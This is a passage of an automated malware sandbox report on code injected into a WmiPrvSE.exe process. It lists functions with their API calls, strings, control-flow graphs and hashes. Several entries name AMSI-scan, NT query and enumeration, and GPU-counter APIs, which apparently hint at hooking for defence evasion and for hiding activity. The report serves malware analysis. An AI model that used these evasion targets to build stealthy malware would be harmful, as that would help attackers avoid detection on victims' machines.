                                                                • Instruction ID: 23a07c552c9a8ebd74313c85f08840be843496768e8c2481701ab8ef010fd4a1
                                                                • Opcode Fuzzy Hash: 0f6af3d613b5716d2d939483ea722be53918ea7012dfc8c5f10971523ef45b65
                                                                • Instruction Fuzzy Hash: 0D71F83A211F6285EB109F65E8906E927B6FB84B88F416231DB4F5BB68DF34C464C340
                                                                Function 000001F5A9681E38 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentThread.KERNEL32 ref: 000001F5A9681E43
                                                                  • Part of subcall function 000001F5A96821BC: GetModuleHandleA.KERNEL32(?,?,?,000001F5A9681E75), ref: 000001F5A96821D4
                                                                  • Part of subcall function 000001F5A96821BC: GetProcAddress.KERNEL32(?,?,?,000001F5A9681E75), ref: 000001F5A96821E5
                                                                  • Part of subcall function 000001F5A9686040: GetCurrentThreadId.KERNEL32 ref: 000001F5A968607B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                • API String ID: 4175298099-4225371247
                                                                • Opcode ID: 0ae55a427d3c7638901636e96ace1ea4cd02cde3c5f2ef49fd533f815a552372
                                                                • Instruction ID: a06507850a88a8c26494303d630f9c7c57c4b121417573e73ee776fd809f5f12
                                                                • Opcode Fuzzy Hash: 0ae55a427d3c7638901636e96ace1ea4cd02cde3c5f2ef49fd533f815a552372
                                                                • Instruction Fuzzy Hash: 814158BC110D6BA4EB04EBA4E8517F42B73AF50384F90B633E70B1B566DE788269C350
                                                                Function 000001F5A96812B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                • String ID: d
                                                                • API String ID: 2005889112-2564639436
                                                                • Opcode ID: 02ec3d665714d09de72fd30cd7b2591f2c5e9e5f28d6ed2dc8e5957e6ee26e2f
                                                                • Instruction ID: 13a72e075ba63b86df87a58be7acb07be05016b5642c0811fa7e3ac42aa3231c
                                                                • Opcode Fuzzy Hash: 02ec3d665714d09de72fd30cd7b2591f2c5e9e5f28d6ed2dc8e5957e6ee26e2f
                                                                • Instruction Fuzzy Hash: DE513036200B9686EB54CF65E4483AAB7B2FB89FC9F049224DB5A47728DF38C0598740
                                                                Function 000001F5A9656E20 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 227COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                • String ID: destructor'$ned$restrict(
                                                                • API String ID: 190073905-924718728
                                                                • Opcode ID: 5499d5914bbaf338e8fd8988aa8eae15f33c4a432fdc488b3fc9270e868cdd22
                                                                • Instruction ID: 281a0115f237cdfce01540164a040d626c0561bcceaadc7465c3b437b63eccfd
                                                                • Opcode Fuzzy Hash: 5499d5914bbaf338e8fd8988aa8eae15f33c4a432fdc488b3fc9270e868cdd22
                                                                • Instruction Fuzzy Hash: B181C07CA00E7386FB649B2599413F966F3AF85780F48A7359B0B87392DB38C865C300
                                                                Function 000001F5A968C9C8 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 162 1f5a968c9c8-1f5a968c9ea GetLastError 163 1f5a968ca09-1f5a968ca14 FlsSetValue 162->163 164 1f5a968c9ec-1f5a968c9f7 FlsGetValue 162->164 167 1f5a968ca16-1f5a968ca19 163->167 168 1f5a968ca1b-1f5a968ca20 163->168 165 1f5a968ca03 164->165 166 1f5a968c9f9-1f5a968ca01 164->166 165->163 169 1f5a968ca75-1f5a968ca80 SetLastError 166->169 167->169 170 1f5a968ca25 call 1f5a968d26c 168->170 171 1f5a968ca82-1f5a968ca94 169->171 172 1f5a968ca95-1f5a968caab call 1f5a968c2e8 169->172 173 1f5a968ca2a-1f5a968ca36 170->173 185 1f5a968caad-1f5a968cab8 FlsGetValue 172->185 186 1f5a968cac8-1f5a968cad3 FlsSetValue 172->186 175 1f5a968ca48-1f5a968ca52 FlsSetValue 173->175 176 1f5a968ca38-1f5a968ca3f FlsSetValue 173->176 179 1f5a968ca54-1f5a968ca64 FlsSetValue 175->179 180 1f5a968ca66-1f5a968ca70 call 1f5a968c734 call 1f5a968d2e4 175->180 178 1f5a968ca41-1f5a968ca46 call 1f5a968d2e4 176->178 178->167 179->178 180->169 191 1f5a968cac2 185->191 192 1f5a968caba-1f5a968cabe 185->192 189 1f5a968cad5-1f5a968cada 186->189 190 1f5a968cb38-1f5a968cb3f call 1f5a968c2e8 186->190 194 1f5a968cadf call 1f5a968d26c 189->194 191->186 192->190 193 1f5a968cac0 192->193 196 1f5a968cb2f-1f5a968cb37 193->196 197 1f5a968cae4-1f5a968caf0 194->197 199 1f5a968cb02-1f5a968cb0c FlsSetValue 197->199 200 1f5a968caf2-1f5a968caf9 FlsSetValue 197->200 201 1f5a968cb0e-1f5a968cb1e FlsSetValue 199->201 202 1f5a968cb20-1f5a968cb28 call 1f5a968c734 199->202 203 1f5a968cafb-1f5a968cb00 call 1f5a968d2e4 200->203 201->203 202->196 208 1f5a968cb2a call 1f5a968d2e4 202->208 203->190 208->196
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968C9D7
                                                                • FlsGetValue.KERNEL32(?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968C9EC
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CA0D
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CA3A
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CA4B
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CA5C
                                                                • SetLastError.KERNEL32(?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CA77
                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CAAD
                                                                • FlsSetValue.KERNEL32(?,?,00000001,000001F5A968E86C,?,?,?,?,000001F5A968BB3F,?,?,?,?,?,000001F5A9687FB0), ref: 000001F5A968CACC
                                                                  • Part of subcall function 000001F5A968D26C: HeapAlloc.KERNEL32(?,?,00000000,000001F5A968CBA2,?,?,?,000001F5A968D255,?,?,?,?,000001F5A968D318), ref: 000001F5A968D2C1
                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CAF4
                                                                  • Part of subcall function 000001F5A968D2E4: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001F5A968651A), ref: 000001F5A968D2FA
                                                                  • Part of subcall function 000001F5A968D2E4: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001F5A968651A), ref: 000001F5A968D304
                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CB05
                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F5A969060B,?,?,?,000001F5A968FFFC,?,?,?,000001F5A968C3EF), ref: 000001F5A968CB16
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                • String ID:
                                                                • API String ID: 570795689-0
                                                                • Opcode ID: ea1292907b734e9d11e3fcb84ab3080f1f1bdd44d437ee5c68a8aa9021d0ae61
                                                                • Instruction ID: aa1ca9ccc57a0a004c6964f139de8c01c752a96db99e4562897ce20bbd4ee722
                                                                • Opcode Fuzzy Hash: ea1292907b734e9d11e3fcb84ab3080f1f1bdd44d437ee5c68a8aa9021d0ae61
                                                                • Instruction Fuzzy Hash: 4441493D201E6242FB58AB35A5A13F93AB35F487A0F14E735AB7747AD6DE28C4314201
                                                                Function 000001F5A965952C Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 310COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000003.1588342977.000001F5A9650000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F5A9650000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_3_1f5a9650000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                • String ID: csm$csm$csm$tion
                                                                • API String ID: 849930591-1951732439
                                                                • Opcode ID: f09f3e55a90dba3aa5aeadb654ffa2933525b3c08332907f23dcf0ef50790ffa
                                                                • Instruction ID: 14a7688fc9a60c2eaeecc28a9aab213da98bcb4e8e6d436ecef43e40f32654a5
                                                                • Opcode Fuzzy Hash: f09f3e55a90dba3aa5aeadb654ffa2933525b3c08332907f23dcf0ef50790ffa
                                                                • Instruction Fuzzy Hash: 7FD1903A600B6186EB60DF65D4803ED77B2FB55798F542225EF8A57B9ACB38C4A4C700
                                                                Function 000001F5A9683184 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$CounterInfoProcess$AllocFree
                                                                • String ID: \GPU Engine(*)\Running Time
                                                                • API String ID: 1943346504-1805530042
                                                                • Opcode ID: bb0a2a73af2016f53cbc39c7c9dc4f70784d8041b84a51f4256f99a6a5f0cca6
                                                                • Instruction ID: e313d6b130846d30a5157a0387079feb843a633eb98ca7b28701cf1f12e63677
                                                                • Opcode Fuzzy Hash: bb0a2a73af2016f53cbc39c7c9dc4f70784d8041b84a51f4256f99a6a5f0cca6
                                                                • Instruction Fuzzy Hash: 37319F36600F6392EB10DF26E8047E9A7B2BF88BC5F4493359F4A47A24DF38C0668740
                                                                Function 000001F5A9683294 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$CounterInfoProcess$AllocFree
                                                                • String ID: \GPU Engine(*)\Utilization Percentage
                                                                • API String ID: 1943346504-3507739905
                                                                • Opcode ID: ddaf5f6d871703ba70be204d02f7f79d3460779af134fd451bd3b067dddc4e4b
                                                                • Instruction ID: 501f8f14ddbf46d3fda791760e549a59aa916d9713dfef1c29b203fa02e6a886
                                                                • Opcode Fuzzy Hash: ddaf5f6d871703ba70be204d02f7f79d3460779af134fd451bd3b067dddc4e4b
                                                                • Instruction Fuzzy Hash: EA315039610F6386EB50DB26A844BE967B2BB84F84F04A2359F4B47725DE38C4658700
                                                                Function 000001F5A968A12C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 322 1f5a968a12c-1f5a968a194 call 1f5a968b044 325 1f5a968a5f5-1f5a968a5fb call 1f5a968c2e8 322->325 326 1f5a968a19a-1f5a968a19d 322->326 326->325 327 1f5a968a1a3-1f5a968a1a9 326->327 329 1f5a968a1af-1f5a968a1b3 327->329 330 1f5a968a278-1f5a968a28a 327->330 329->330 334 1f5a968a1b9-1f5a968a1c4 329->334 332 1f5a968a290-1f5a968a294 330->332 333 1f5a968a545-1f5a968a549 330->333 332->333 335 1f5a968a29a-1f5a968a2a5 332->335 337 1f5a968a582-1f5a968a58c call 1f5a9689224 333->337 338 1f5a968a54b-1f5a968a552 333->338 334->330 336 1f5a968a1ca-1f5a968a1cf 334->336 335->333 339 1f5a968a2ab-1f5a968a2af 335->339 336->330 340 1f5a968a1d5-1f5a968a1df call 1f5a9689224 336->340 337->325 351 1f5a968a58e-1f5a968a5ad call 1f5a9687e40 337->351 338->325 341 1f5a968a558-1f5a968a57d call 1f5a968a5fc 338->341 343 1f5a968a475-1f5a968a481 339->343 344 1f5a968a2b5-1f5a968a2f0 call 1f5a9689604 339->344 340->351 356 1f5a968a1e5-1f5a968a210 call 1f5a9689224 * 2 call 1f5a968990c 340->356 341->337 343->337 348 1f5a968a487-1f5a968a48b 343->348 344->343 360 1f5a968a2f6-1f5a968a2ff 344->360 353 1f5a968a48d-1f5a968a499 call 1f5a96898cc 348->353 354 1f5a968a49b-1f5a968a4a3 348->354 353->354 366 1f5a968a4bc-1f5a968a4c4 353->366 354->337 359 1f5a968a4a9-1f5a968a4b6 call 1f5a96894a4 354->359 390 1f5a968a230-1f5a968a23a call 1f5a9689224 356->390 391 1f5a968a212-1f5a968a216 356->391 359->337 359->366 364 1f5a968a303-1f5a968a335 360->364 368 1f5a968a468-1f5a968a46f 364->368 369 1f5a968a33b-1f5a968a347 364->369 371 1f5a968a5d8-1f5a968a5f4 call 1f5a9689224 * 2 call 1f5a968c248 366->371 372 1f5a968a4ca-1f5a968a4ce 366->372 368->343 368->364 369->368 373 1f5a968a34d-1f5a968a36c 369->373 371->325 375 1f5a968a4d0-1f5a968a4df call 1f5a96898cc 372->375 376 1f5a968a4e1 372->376 377 1f5a968a372-1f5a968a3af call 1f5a96898e0 * 2 373->377 378 1f5a968a458-1f5a968a45d 373->378 381 1f5a968a4e3-1f5a968a4ed call 1f5a968b0dc 375->381 376->381 402 1f5a968a3e2-1f5a968a3e5 377->402 378->368 381->337 400 1f5a968a4f3-1f5a968a543 call 1f5a9689534 call 1f5a9689738 381->400 390->330 405 1f5a968a23c-1f5a968a25c call 1f5a9689224 * 2 call 1f5a968b0dc 390->405 391->390 393 1f5a968a218-1f5a968a223 391->393 393->390 399 1f5a968a225-1f5a968a22a 393->399 399->325 399->390 400->337 408 1f5a968a3b1-1f5a968a3d7 call 1f5a96898e0 call 1f5a968a86c 402->408 409 1f5a968a3e7-1f5a968a3ee 402->409 427 1f5a968a25e-1f5a968a268 call 1f5a968b1cc 405->427 428 1f5a968a273 405->428 423 1f5a968a3f9-1f5a968a456 call 1f5a968a058 408->423 424 1f5a968a3d9-1f5a968a3dc 408->424 413 1f5a968a45f 409->413 414 1f5a968a3f0-1f5a968a3f4 409->414 418 1f5a968a464 413->418 414->377 418->368 423->418 424->402 432 1f5a968a26e-1f5a968a5d1 call 1f5a9688e84 call 1f5a968ac28 call 1f5a9689078 427->432 433 1f5a968a5d2-1f5a968a5d7 call 1f5a968c248 427->433 428->330 432->433 433->371
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 849930591-393685449
                                                                • Opcode ID: fa73655f7b7bd44e3e4d6446ad22319a2763a7ac19eba2559d2b609f8e2af79f
                                                                • Instruction ID: 8cf5bd1060aecb248f18b15918fddee17702db1596663ea5d0b3082e2d5d76ad
                                                                • Opcode Fuzzy Hash: fa73655f7b7bd44e3e4d6446ad22319a2763a7ac19eba2559d2b609f8e2af79f
                                                                • Instruction Fuzzy Hash: 4ED1AF76610B628AEB20DF65D4403ED7BB2FB45788F10A325EF8A57B96CB34C5A1C701
                                                                Function 000001F5A968EF34 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 443 1f5a968ef34-1f5a968ef86 444 1f5a968f077 443->444 445 1f5a968ef8c-1f5a968ef8f 443->445 448 1f5a968f079-1f5a968f095 444->448 446 1f5a968ef91-1f5a968ef94 445->446 447 1f5a968ef99-1f5a968ef9c 445->447 446->448 449 1f5a968efa2-1f5a968efb1 447->449 450 1f5a968f05c-1f5a968f06f 447->450 451 1f5a968efc1-1f5a968efe0 LoadLibraryExW 449->451 452 1f5a968efb3-1f5a968efb6 449->452 450->444 455 1f5a968f096-1f5a968f0ab 451->455 456 1f5a968efe6-1f5a968efef GetLastError 451->456 453 1f5a968f0b6-1f5a968f0c5 GetProcAddress 452->453 454 1f5a968efbc 452->454 459 1f5a968f055 453->459 460 1f5a968f0c7-1f5a968f0ee 453->460 457 1f5a968f048-1f5a968f04f 454->457 455->453 458 1f5a968f0ad-1f5a968f0b0 FreeLibrary 455->458 461 1f5a968eff1-1f5a968f008 call 1f5a968c4c8 456->461 462 1f5a968f036-1f5a968f040 456->462 457->449 457->459 458->453 459->450 460->448 461->462 465 1f5a968f00a-1f5a968f01e call 1f5a968c4c8 461->465 462->457 465->462 468 1f5a968f020-1f5a968f034 LoadLibraryExW 465->468 468->455 468->462
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeLibraryProc
                                                                • String ID: api-ms-$ext-ms-
                                                                • API String ID: 3013587201-537541572
                                                                • Opcode ID: dbadeb88dc87e3b828c2078f2cbd2f6a3078456db927c7acdc20e85c0feead20
                                                                • Instruction ID: bd87ae7fd6780d90ee3a6f4b4dfde8cf355deb03746049640dde659a5939dc23
                                                                • Opcode Fuzzy Hash: dbadeb88dc87e3b828c2078f2cbd2f6a3078456db927c7acdc20e85c0feead20
                                                                • Instruction Fuzzy Hash: C941D33A321E3245EB16CB26A8547F526B2BF48BE0F15A7359F1F5B784EE38C4658340
                                                                Function 000001F5A968104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 469 1f5a968104c-1f5a96810b9 RegQueryInfoKeyW 470 1f5a96810bf-1f5a96810c9 469->470 471 1f5a96811b5-1f5a96811d0 469->471 470->471 472 1f5a96810cf-1f5a968111f RegEnumValueW 470->472 473 1f5a96811a5-1f5a96811af 472->473 474 1f5a9681125-1f5a968112a 472->474 473->471 473->472 474->473 475 1f5a968112c-1f5a9681135 474->475 476 1f5a9681147-1f5a968114c 475->476 477 1f5a9681137 475->477 479 1f5a968114e-1f5a9681193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 476->479 480 1f5a9681199-1f5a96811a3 476->480 478 1f5a968113b-1f5a968113f 477->478 478->473 481 1f5a9681141-1f5a9681145 478->481 479->480 480->473 481->476 481->478
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                • String ID: d
                                                                • API String ID: 3743429067-2564639436
                                                                • Opcode ID: 5a58378ec682f77b284a5a83fb5b6f102801a0cd5293b6f0a8f96f7b28fbadf9
                                                                • Instruction ID: fbf3de63645309af1ccd4d04a2506a212f7b20fe7b776645e42e9b47978efc3b
                                                                • Opcode Fuzzy Hash: 5a58378ec682f77b284a5a83fb5b6f102801a0cd5293b6f0a8f96f7b28fbadf9
                                                                • Instruction Fuzzy Hash: 71414D76214B91C6E760CF61E4443AE77B2F788B98F449225DB8A4B758DF38C459CB40
                                                                Function 000001F5A968CC08 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • FlsGetValue.KERNEL32(?,?,?,000001F5A968C37E,?,?,?,?,?,?,?,?,000001F5A968CB3D,?,?,00000001), ref: 000001F5A968CC27
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968C37E,?,?,?,?,?,?,?,?,000001F5A968CB3D,?,?,00000001), ref: 000001F5A968CC46
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968C37E,?,?,?,?,?,?,?,?,000001F5A968CB3D,?,?,00000001), ref: 000001F5A968CC6E
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968C37E,?,?,?,?,?,?,?,?,000001F5A968CB3D,?,?,00000001), ref: 000001F5A968CC7F
                                                                • FlsSetValue.KERNEL32(?,?,?,000001F5A968C37E,?,?,?,?,?,?,?,?,000001F5A968CB3D,?,?,00000001), ref: 000001F5A968CC90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2352615526.000001F5A9681000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F5A9680000, based on PE: true
                                                                • Associated: 00000009.00000002.2335281888.000001F5A9680000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2361164377.000001F5A9696000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491439010.000001F5A96A1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491480771.000001F5A96A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000009.00000002.2491533202.000001F5A96A9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1f5a9680000_WmiPrvSE.jbxd
                                                                Similarity
                                                                • API ID: Value
                                                                • String ID: 1%$Y%
                                                                • API String ID: 3702945584-1395475152
                                                                • Opcode ID: 73f99dd158d02f66700fb77c4ca87c0b903f96ca38ef138df72cf0141c470259
                                                                • Instruction ID: 70642205af09bb767061929add3d51bc13c819841e5d26c10d5d4f12907b7e30
